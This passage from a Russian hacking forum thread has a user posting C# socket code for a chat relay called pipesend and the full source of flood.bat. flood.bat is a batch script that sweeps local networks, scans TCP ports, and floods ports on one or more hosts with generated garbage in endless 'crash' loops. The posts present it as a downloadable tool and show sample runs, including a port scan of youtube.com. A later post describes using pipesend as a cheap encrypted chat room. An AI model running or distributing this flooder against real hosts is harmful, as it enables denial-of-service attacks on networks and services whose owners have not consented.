                        try { fs.Close(); } catch { }
                        try { os.Close(); } catch { }

                    }
                    try { sok.Shutdown(SocketShutdown.Both); } catch { }
                    try { sok.Close(); } catch { }

                }
                catch { }

                if (done) Console.WriteLine("ok");
                else Console.WriteLine("error");
        }

        static Socket BindSocket = null;
        static Socket data = null;
        static async Task Accepter()
        {
            Socket bind = BindSocket;
            bind.ReceiveTimeout = 256;

            while (true)
                try
                {
                    data = bind.Accept();
                    if (data == null)
                    {
                        await Task.Delay(30);
                        continue;
                    }
                    data.ReceiveTimeout = 1000;
                    Task.Run(SocketReader);
                    await Task.Delay(500);
                }
                catch { }
        }

        static List<Socket> clients = new List<Socket>();

        static object clients_lock = new object();

        static async Task SocketReader()
        {
            Socket DataSocket = data;
            NetworkStream ns = null;
            try
            {
                Stream fs = Console.OpenStandardOutput();

                lock (clients_lock) clients.Add(DataSocket);

                byte[] buf = new byte[8192];

                do
                {
                    int r = 0;

                    if (DataSocket.Available > 0) r = DataSocket.Receive(buf);

                    if (r < 0) break;
                    else
                    {
                        byte[] sbuf = new byte[r];

                        for (int i = 0; i < r; i++) sbuf[i] = buf[i];

                        fs.Write(buf, 0, r);
                        fs.Flush();

                        for (int i = 0; i < clients.Count; i++)
                            if (clients[i] != DataSocket)
                    try { clients[i].Send(sbuf); } catch { }
                    }
                } while (true);

                try { fs.Close(); } catch { }
            }
            catch { }

            try { DataSocket.Shutdown(SocketShutdown.Both); } catch { }
            try { DataSocket.Close(); } catch { }
            
            lock(clients_lock) {
                for (int i = 0; i < clients.Count; i++) if (clients[i] == DataSocket)
                    { clients.RemoveAt(i); break; }
            }
        }
    }
}



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Пятница, 02.08.2024, 12:10
Статус: нет меня
 
Talomir #417 | Пятница, 02.08.2024, 18:19
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ЕЩЁ РАЗ УЛУЧШЕННЫЙ СКАННЕР НЮКЕР ФАЗЕР ФЛУДЕР ПОРТОВ


Ещё раз улучшенный фаззер портов, в этом улучшении обновлён компонент pipesend.exe и улучшен вывод на экран. Привожу примеры и исходники, архив со скриптом и бинарниками закачаю для скачивания немного позже.

Код
FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port
USAGE:
flood --scan 192.168.1                   find hosts on local net and shows their names and IP addresses
flood --scan2 192.168                    find hosts on local net level 2 and shows their names and IP addresses
flood --scanports 192.168.1.1            scan open root ports on given host
flood --scanallports 192.168.1.1         scan all open ports on given host
flood --crash 192.168.1.187              flood with supplied phrase.exe generator (no and -a options of generator)
flood --crash 192.168.1.187 my_gen.exe   flood with user's my_gen.exe trash generator
flood --crashport 192.168.1.187 80       flood port with supplied phrase.exe generator (no and -a options of generator)
flood --crashport 192.168.1.187 80 my.exe     flood port with user's my.exe generator


Код
flood --scan 192.168.1

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     router.asus.com
Address:  192.168.1.1

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     WIN-J2G446M9P30
Address:  192.168.1.63

Сервер:  router.asus.com
Address:  192.168.1.1

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     Vladimirs-MBP
Address:  192.168.1.241


Код
flood --scan2 192.168

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     router.asus.com
Address:  192.168.1.1

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     WIN-J2G446M9P30
Address:  192.168.1.63

Сервер:  router.asus.com
Address:  192.168.1.1

Сервер:  router.asus.com
Address:  192.168.1.1

Имя:     Vladimirs-MBP
Address:  192.168.1.241

Сервер:  router.asus.com
Address:  192.168.1.1


Код
flood --scanports www.youtube.com

80 open tcp
443 open tcp


Код
@echo off

if "%1" == "--scan" goto Scan
if "%1" == "--scan2" goto Scan2
if "%1" == "--scanports" goto Scanports
if "%1" == "--scanallports" goto Scanallports
if "%1" == "--crash" goto Crash
if "%1" == "--crashport" goto Crashport

echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port
echo USAGE:
echo flood --scan 192.168.1                   find hosts on local net and shows their names and IP addresses
echo flood --scan2 192.168                    find hosts on local net level 2 and shows their names and IP addresses
echo flood --scanports 192.168.1.1            scan open root ports on given host
echo flood --scanallports 192.168.1.1         scan all open ports on given host
echo flood --crash 192.168.1.187              flood with supplied phrase.exe generator (no and -a options of generator)
echo flood --crash 192.168.1.187 my_gen.exe   flood with user's my_gen.exe trash generator
echo flood --crashport 192.168.1.187 80       flood port with supplied phrase.exe generator (no and -a options of generator)
echo flood --crashport 192.168.1.187 80 my.exe     flood port with user's my.exe generator

goto exit_me

:Crash

for /L %%P in (1,1,1024) do (

echo Pong %2 %%P TCP unicode
if "%3" == "" (cmd /C phrase.exe|pipesend %2 %%P) else (cmd /C %3|pipesend %2 %%P)

echo Pong %2 %%P TCP ascii
if "%3" == "" (cmd /C phrase.exe -a|pipesend %2 %%P) else (cmd /C %3 -a|pipesend %2 %%P)
)

goto Crash

:Crashport

echo Pong %2 %3 TCP unicode
if "%4" == "" (cmd /C phrase.exe|pipesend %2 %3) else (cmd /C %4|pipesend %2 %3)

echo Pong %2 %3 TCP ascii
if "%4" == "" (cmd /C phrase.exe -a|pipesend %2 %3) else (cmd /C %4 -a|pipesend %2 %3)

goto Crashport

:Scan
for /L %%Q in (0,1,255) do (
    ping -n 1 -w 20 %2.%%Q | find "TTL" >_1_%2%%Q
    if not errorlevel 1 nslookup %2.%%Q
    del _1_%2%%Q
)
goto exit_me

:Scan2
for /L %%Q in (0,1,255) do (
    for /L %%R in (0,1,255) do (
  ping -n 1 -w 20 %2.%%Q.%%R | find "TTL" >_1_%2.%%Q%%R
  if not errorlevel 1 nslookup %2.%%Q.%%R
  del _1_%2.%%Q%%R
    )
)
goto exit_me

:Scanports
for /L %%Q in (1,1,1024) do (
    echo GET|pipesend %2 %%Q | find "ok" >_1_%2%%Q
    if not errorlevel 1 echo %%Q open tcp
    del _1_%2%%Q
)
goto exit_me

:Scanallports
for /L %%Q in (1,1,65535) do (
    echo GET|pipesend %2 %%Q | find "ok" >_1_%2.%%Q
    if not errorlevel 1 echo %%Q open tcp
    del _1_%2.%%Q
)
goto exit_me
  
:exit_me




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Пятница, 02.08.2024, 18:42
Статус: нет меня
 
Talomir #418 | Пятница, 02.08.2024, 20:03
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
CКАЧАТЬ ФЛУДЕР ПОРТОВ FLOOD.BAT И ГРУППОВОЙ ЧАТ PIPESEND

hack-13-pipesend-flood.7z



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Воскресенье, 04.08.2024, 14:53
Статус: нет меня
 
Talomir #419 | Суббота, 03.08.2024, 10:02
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ОБНОВИЛ РАЗДАЧУ ФЛУДЕРА

Это обновление улучшает юзабилити скрипта flood.bat

FLOOD.BAT: flood host with generator's garbage to ports 1-1024 or a given port
USAGE:
flood --ping 192.168.1 find hosts on local net and shows their names and IP addresses
flood --ping2 192.168 find hosts on local net level 2 and shows their names and IP addresses
flood --scan host scan open root tcp ports on given host
flood --scanall host scan all open tcp ports on given host
flood --crashport phrase.exe 80 host1... host6 flood port 80 on set of hosts with fuzzer phrase.exe
flood --crashall phrase.exe host1... host6 flood ports 1-1024 with phrase.exe generator

Теперь в режимах крэша порта и крэша портов рута 1-1024 можно указывать сразу до 6 хостов на запуск, все они будут крэшися одним окном. Это сокращает и набор на клавиатуре и неразбериху с окнами на экране.

Режим сканирования хостов сети теперь называется --ping и --ping2.

Режимы сканирования портов так и называются --scan для первых 1-1024 и --scanall для всех портов 1-65535. Ссылка на скачивание в предыдущем посту обновлена.



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Суббота, 03.08.2024, 10:02
Статус: нет меня
 
Talomir #420 | Суббота, 03.08.2024, 13:19
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ШИФРОВАННЫЕ МЕЖДУНАРОВНЫЕ ПЕРЕГОВОРЫ ДО 3 ЕВРО В МЕСЯЦ TUTORIAL


Арендуете линукс-дедик за 7 евро в месяц, наример в deltahost.ua

Ставите mono-complete через apt для запуска программ на C#

Заускаете pipesend на порту 7777 интерфейса 127.0.0.1

Заводите пользователей с надёжными паролями и ложите им в home утилиту pipesend (или прописываете путь к pipesend в PATH)

Всё, пользователи могут заходить через putty на сервер и общаться в общей комнате на порту 7777. Трафик до сервера при этом шифруется по открытому ключу OpenSSL, а локальный трафик localhost-чата не выходит за пределы оперативной памяти сервера, то есть переговоры получаются супер-надёжными, шированными.

На одном линукс-сервере можно запустить несколько pipesend, на разных портах, на интерфейсах localhost и внешнем, сделав множество чат-румов. На localhost-е - для общения с шифрованием, разные группы, на внешнем ip - для чат-румов без шифрования с Windows машин, общих чат-румов. Доступ к румам с шифрованием админ может контролировать паролями пользователей (например, пользователи могут скидываться на аренду дедика).

Общая стоимость аренды линукса в реальным ip, 7 евро, делится на количество пользователей в руме, не надо платить каждому как за телефон с Android. Так, если пользователей всего 2, то шифрованная связь обходится в 3.5 евро в месяц, а если пользователей около 7, например - программерская группа, то шифрованная связь будет обходиться всего в 1 евро в месяц, то есть в 10 раз дешевле телефона, и это - междунаровдная связь с шифрованием и без отслеживания!

Также, можно запилить коммерческий сервис шифрованных переговоров, арендовав дедик и беря с пользователей абонплату за шифрованное общение на сервере. При это бесплатные переговоры с Windows на публичном ip будут хорошей рекламой серверу.

Более подробно о pipesend можно прочитать в постах выше, там же скачать эту замечательную утилиту



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Поиск:

[ Новые сообщения на форуме ]



Форма входа